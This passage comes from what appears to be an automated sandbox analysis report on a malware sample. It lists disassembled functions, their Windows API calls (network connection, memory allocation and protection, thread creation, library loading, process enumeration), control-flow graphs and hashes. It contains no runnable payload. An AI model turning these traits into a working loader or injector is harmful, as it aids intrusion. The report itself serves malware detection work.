                    • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                    • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08
                    Function 0066EA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A
                    • InternetOpenA.WININET ref: 0066EB0C
                    • InternetSetOptionA.WININET ref: 0066EB2C
                    • InternetSetOptionA.WININET ref: 0066EB44
                    • InternetConnectA.WININET ref: 0066EB7A
                    • InternetSetOptionA.WININET ref: 0066EBB7
                    • InternetSetOptionA.WININET ref: 0066EBE2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$Option$ConnectOpenRevertSelf
                    • String ID:
                    • API String ID: 1513466045-0
                    • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                    • Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
                    • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                    • Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04
                    Function 0066CA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 228 66ca74-66cbd6 call 675fec call 6761e8 * 3 call 67b454 call 67b464 * 2 call 67b434 * 2 call 67b454 * 2 call 67f284 call 67b434 * 3 call 67b464 call 67c230 call 6734a0 call 67eaa8 * 2 call 66f3c0 271 66cbdd-66cbf2 call 67b434 call 66f1e4 228->271 272 66cbd8 call 67da74 228->272 278 66cbf4 call 67da74 271->278 279 66cbf9-66cc07 call 66f1f8 271->279 272->271 278->279 283 66cc0e-66cc15 call 66f274 279->283 284 66cc09 call 67da74 279->284 288 66cc17 call 67da74 283->288 289 66cc1c-66cc55 call 67b464 call 67b434 call 67f284 283->289 284->283 288->289 297 66cc57 call 67da74 289->297 298 66cc5c-66cc90 call 67b434 call 67eaa8 call 67b434 call 675c60 289->298 297->298 308 66cc96-66cc9d 298->308 309 66cebb-66cee7 call 67c218 call 67f244 call 67da74 298->309 311 66cca2-66cd24 call 67bfc0 call 67f63c call 67bfc0 call 67f63c * 2 call 672ee0 308->311 329 66cd26-66cd2a 311->329 330 66cd44-66cd77 call 66ea48 call 67b434 call 66e9f4 311->330 332 66cd2e-66cd35 329->332 341 66cd9c-66cd9f 330->341 342 66cd79-66cd87 call 67ad44 330->342 332->332 334 66cd37-66cd3a 332->334 334->330 336 66cd3c-66cd3f call 6731f4 334->336 336->330 344 66ce26 341->344 345 66cda5-66cdc8 call 676b98 call 67b434 341->345 350 66cd95-66cd98 342->350 351 66cd89-66cd93 call 678e0c 342->351 348 66ce2c-66ce38 call 66e9c8 call 66f3c0 344->348 359 66cdcf-66cdf0 call 6718c4 call 675144 call 674a04 call 66f3c0 345->359 360 66cdca 345->360 363 66ce3f-66ce5d call 67bf04 348->363 364 66ce3a call 67da74 348->364 350->341 351->341 389 66cdf2-66cdf5 call 66f484 359->389 390 66cdfa-66ce01 359->390 360->359 370 66ce64-66ce6c 363->370 371 66ce5f call 67da74 363->371 364->363 370->309 374 66ce6e-66ce76 370->374 371->370 376 66cea4 call 67211c 374->376 377 66ce78-66ce89 374->377 383 66cea9-66ceb5 376->383 379 66ce9c 377->379 380 66ce8b-66ce9a call 66f3a0 377->380 385 66ce9e-66cea0 379->385 380->385 383->309 383->311 385->376 388 66cea2 385->388 388->376 389->390 390->348 391 66ce03-66ce24 call 66e9c8 call 66ea48 call 66ec04 390->391 391->348
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • malloc.LIBCMT ref: 0066CB3B
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
                      • Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
                      • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
                      • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311
                      • Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE
                      • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                      • Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07
                      • Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF
                    • malloc.LIBCMT ref: 0066CC4A
                    • _snprintf.LIBCMT ref: 0066CCC1
                    • _snprintf.LIBCMT ref: 0066CCE7
                    • free.LIBCMT ref: 0066CEC6
                      • Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
                      • Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F
                      • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
                      • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A
                    • _snprintf.LIBCMT ref: 0066CD0E
                      • Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
                      • Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                    • String ID:
                    • API String ID: 548016584-0
                    • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                    • Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
                    • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                    • Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708
                    Function 0066F014 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 406 66f014-66f04f call 66f118 call 692660 411 66f051-66f053 406->411 412 66f058-66f097 WSAIoctl 406->412 413 66f0f6-66f10a 411->413 414 66f0b4-66f0be 412->414 415 66f099-66f0b0 412->415 416 66f0c0 414->416 417 66f0eb-66f0ee call 6925e8 414->417 415->414 419 66f0c5-66f0cf 416->419 420 66f0f4 417->420 421 66f0d6-66f0e2 419->421 422 66f0d1-66f0d4 419->422 420->413 421->417 424 66f0e4 421->424 422->421 423 66f0e6 422->423 423->417 424->419
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: IoctlSocketStartupclosesocket
                    • String ID:
                    • API String ID: 365704328-0
                    • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                    • Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
                    • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                    • Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00
                    Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 425 401595-4015c5 VirtualAlloc 426 4015c7-4015c9 425->426 427 4015e0-40162c call 401563 VirtualProtect CreateThread 426->427 428 4015cb-4015de 426->428 428->426
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: Virtual$AllocCreateProtectThread
                    • String ID:
                    • API String ID: 3039780055-0
                    • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                    • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                    • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                    • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308
                    Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 431 401704-40175c CreateFileA 432 40179c-4017a5 431->432 433 40175e-401760 431->433 434 401781-40178f CloseHandle 433->434 435 401762-40177f ReadFile 433->435 434->432 435->434 436 401791-40179a 435->436 436->433
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleRead
                    • String ID:
                    • API String ID: 1035965006-0
                    • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                    • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                    • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                    • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08
                    Function 0066F118 Relevance: 3.0, APIs: 2, Instructions: 42networkCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 437 66f118-66f12a 438 66f14e-66f150 437->438 439 66f12c-66f136 call 6925e0 437->439 441 66f152-66f159 438->441 442 66f1c9-66f1d1 438->442 444 66f13c-66f13e 439->444 441->442 443 66f15b-66f1c2 call 67b434 * 2 call 67b454 * 4 441->443 443->442 446 66f144 444->446 447 66f1d2-66f1e3 call 6925d8 call 680414 444->447 446->438
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CleanupStartup
                    • String ID:
                    • API String ID: 915672949-0
                    • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                    • Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
                    • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                    • Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15
                    Function 001B96B4 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 463 1b96b4-1b971e 464 1b9723-1b972c 463->464 465 1b994f-1b9963 464->465 466 1b9732-1b97b6 call 1b8b64 LoadLibraryA 464->466 469 1b97bb-1b97c4 466->469 470 1b97ca-1b97d0 469->470 471 1b993c-1b994a 469->471 472 1b98a9-1b9910 call 1b8b64 470->472 473 1b97d6-1b97ee 470->473 471->464 477 1b9913-1b9927 472->477 473->472 474 1b97f4-1b98a7 473->474 474->477 478 1b9929-1b9932 477->478 479 1b9937 477->479 478->479 479->469
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                    • Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
                    • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                    • Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00
                    Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 481 403040-403051 call 401950 call 4017f8 486 403058-40305f SleepEx 481->486 486->486
                    APIs
                      • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                      • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                      • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                      • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                    • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: Sleep$CountCreateThreadTickmalloc
                    • String ID:
                    • API String ID: 345437100-0
                    • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                    • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                    • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                    • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E
                    Function 001B9324 Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 487 1b9324-1b9358 488 1b935e-1b9374 487->488 489 1b944d-1b9453 487->489 488->489 493 1b937a-1b93c2 488->493 490 1b9479-1b9482 489->490 491 1b9455-1b9474 VirtualAlloc 489->491 491->490 495 1b93ce-1b93d4 493->495 496 1b9402-1b9408 495->496 497 1b93d6-1b93de 495->497 496->489 498 1b940a-1b9445 496->498 497->496 499 1b93e0-1b93e6 497->499 498->489 499->496 500 1b93e8-1b9400 499->500 500->495
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                    • Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
                    • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                    • Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00

                    Non-executed Functions

                    Function 00686514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                    • String ID: U
                    • API String ID: 3902385426-4171548499
                    • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                    • Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
                    • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                    • Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11
                    Function 0067867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00678FA0
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
                    • Process32First.KERNEL32 ref: 00678FFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                    • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                    • API String ID: 718051232-1833344708
                    • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                    • Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
                    • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                    • Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41
                    Function 00682F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 00683002
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _fileno.LIBCMT ref: 0068302F
                      • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                      • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                    • write_multi_char.LIBCMT ref: 0068366B
                    • write_string.LIBCMT ref: 00683688
                    • write_multi_char.LIBCMT ref: 006836A5
                    • write_string.LIBCMT ref: 00683704
                    • write_string.LIBCMT ref: 0068373B
                    • write_multi_char.LIBCMT ref: 0068375D
                    • free.LIBCMT ref: 00683771
                    • _isleadbyte_l.LIBCMT ref: 00683842
                    • write_char.LIBCMT ref: 00683858
                    • write_char.LIBCMT ref: 00683879
                    • _errno.LIBCMT ref: 0068397C
                    • _invalid_parameter_noinfo.LIBCMT ref: 00683987
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID: $@
                    • API String ID: 3318157856-1077428164
                    • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                    • Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
                    • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                    • Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01
                    Function 00682528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068258E
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _fileno.LIBCMT ref: 006825BB
                      • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                      • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                    • write_multi_char.LIBCMT ref: 00682BEB
                    • write_string.LIBCMT ref: 00682C08
                    • write_multi_char.LIBCMT ref: 00682C25
                    • write_string.LIBCMT ref: 00682C84
                    • write_string.LIBCMT ref: 00682CBB
                    • write_multi_char.LIBCMT ref: 00682CDD
                    • free.LIBCMT ref: 00682CF1
                    • _isleadbyte_l.LIBCMT ref: 00682DC2
                    • write_char.LIBCMT ref: 00682DD8
                    • write_char.LIBCMT ref: 00682DF9
                    • _errno.LIBCMT ref: 00682EF3
                    • _invalid_parameter_noinfo.LIBCMT ref: 00682EFE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID:
                    • API String ID: 3318157856-3916222277
                    • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                    • Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
                    • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                    • Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40
                    Function 001C239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001C2402
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _fileno.LIBCMT ref: 001C242F
                      • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                      • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                    • write_multi_char.LIBCMT ref: 001C2A6B
                    • write_string.LIBCMT ref: 001C2A88
                    • write_multi_char.LIBCMT ref: 001C2AA5
                    • write_string.LIBCMT ref: 001C2B04
                    • write_string.LIBCMT ref: 001C2B3B
                    • write_multi_char.LIBCMT ref: 001C2B5D
                    • free.LIBCMT ref: 001C2B71
                    • _isleadbyte_l.LIBCMT ref: 001C2C42
                    • write_char.LIBCMT ref: 001C2C58
                    • write_char.LIBCMT ref: 001C2C79
                    • _errno.LIBCMT ref: 001C2D7C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C2D87
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID: $@
                    • API String ID: 3318157856-1077428164
                    • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                    • Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
                    • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                    • Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01
                    Function 001C1928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001C198E
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _fileno.LIBCMT ref: 001C19BB
                      • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                      • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                    • write_multi_char.LIBCMT ref: 001C1FEB
                    • write_string.LIBCMT ref: 001C2008
                    • _errno.LIBCMT ref: 001C22F3
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C22FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                    • String ID: -$0
                    • API String ID: 3246410048-417717675
